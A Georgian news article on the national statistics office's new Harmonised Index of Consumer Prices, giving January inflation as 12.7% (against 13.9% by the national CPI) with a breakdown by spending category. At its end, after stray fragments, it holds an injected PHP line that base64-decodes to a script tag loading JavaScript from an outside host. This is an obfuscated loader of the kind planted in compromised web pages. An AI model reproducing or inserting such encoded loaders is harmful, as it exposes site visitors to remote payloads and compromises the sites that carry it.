celsiusi
ავერსი შნაიდერი
საქართველოს სტატისტიკის ეროვნული სამსახური ახალი ინდიკატორის - სამომხმარებლო ფასების ჰარმონიზებული ინდექსის (Harmonised Index of Consumer Prices – HICP) გამოქვეყნებას იწყებს. ამ მეთოდოლოგიის თანახმად, იანვარში ინფლაციამ 12.7% შეადგინა, რაც ეროვნული მეთოდოლოგიით გაანგარიშებულ 13.9%-იან ინფლაციაზე 1.2 პროცენტული პუნქტით დაბალია. 
 
"HICP გამოიყენება, ძირითადად, ევროკავშირის წევრი ქვეყნების მიერ და წარმოადგენს ფასების სტაბილურობის უმნიშვნელოვანეს მაჩვენებელს. ის ეფუძნება ერთიან, ჰარმონიზებულ მეთოდოლოგიას და ამდენად, საქართველოს მიერ ამ ინდიკატორის წარმატებით დანერგვას დიდი მნიშვნელობა ენიჭება ევროკავშირის სტანდარტებთან დაახლოების თვალსაზრისით. სამომხმარებლო ფასების ჰარმონიზებული ინდექსის გაანგარიშება ეფუძნება ევროკავშირის მიერ შემუშავებულ მეთოდოლოგიურ სახელმძღვანელოს და რეგულაციებს, რომელთა ზედმიწევნით დაცვა სავალდებულოა ამ ინდიკატორის მწარმოებელი ყველა ქვეყნისთვის.
 
სამომხმარებლო ფასების ინდექსისგან (CPI) მას რამდენიმე მეთოდოლოგიური თავისებურება განასხვავებს, ძირითადად, სამომხმარებლო კალათის წონების და გამოყენებული კლასიფიკატორის ნაწილში. კერძოდ, HICP-ის შემთხვევაში სამომხმარებლო კალათის წონების გაანგარიშებისას გამოიყენება როგორც რეზიდენტების, ისე არარეზიდენტების მიერ ქვეყნის ტერიტორიაზე გაწეული ხარჯები, მაშინ როდესაც CPI-თვის გამოიყენება მხოლოდ რეზიდენტების მიერ გაწეული დანახარჯები, როგორც ქვეყანაში, ისე მის ფარგლებს გარეთ. რაც შეეხება კლასიფიკატორს, HICP-თვის გამოიყენება „დანიშნულების მიხედვით ინდივიდუალური მოხმარების კლასიფიკაციის“ ევროპული ვერსია - ECOICOP, რომელიც მცირედით განსხვავდება ამჟამად საერთაშორისო დონეზე მოქმედი COICOP-გან.
 
ამასთან აღსანიშნავია, რომ სამომხმარებლო კალათის შემადგენლობა და გამოყენებული მიკრომონაცემები იდენტურია ორივე ინდექსისთვის. HICP არ შეცვლის აქამდე არსებულ სამომხმარებლო ფასების ინდექსს, რომელიც კვლავ გამოიყენება ინფლაციის მაჩვენებლის გაანგარიშებისთვის. ჰარმონიზებული ინდექსი წარმოადგენს დამატებით საანალიზო მაჩვენებელს და გამოყენებული იქნება საერთაშორისო შესადარისობის უზრუნველყოფისთვის,"- ნათქვამია საქსტატის მიერ გამოქვეყნებულ ინფორმაციაში. 
 
ცალკეული კომპონენტების მიხედვით, HICP მეთოდოლოგიით დათვლილი 12.7%-იანი ინფლაცია ასე ნაწილდება:
 
სურსათი და უალკოჰოლო სასმელები - 15,2%
ალკოჰოლური სასმელები, თამბაქო - 6,0%
ტანსაცმელი და ფეხსაცმელი - -1,4%
საცხოვრებელი სახლი, წყალი, ელექტროენერგია, აირი და სათბობის სხვა სახეები - 41,6%
ავეჯი, საოჯახო ნივთები და მორთულობა, სახლის მოვლა-შეკეთება - 11,8%
ჯანმრთელობის დაცვა - 6,9%
ტრანსპორტი - 13,4%
კავშირგაბმულობა - -0,6%
დასვენება, გართობა და კულტურა  - 1,1%
განათლება  - 3,9%
სასტუმროები, კაფეები და რესტორნები - 15,7%
სხვადასხვა საქონელი და მომსახურება - 5,8%
835
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");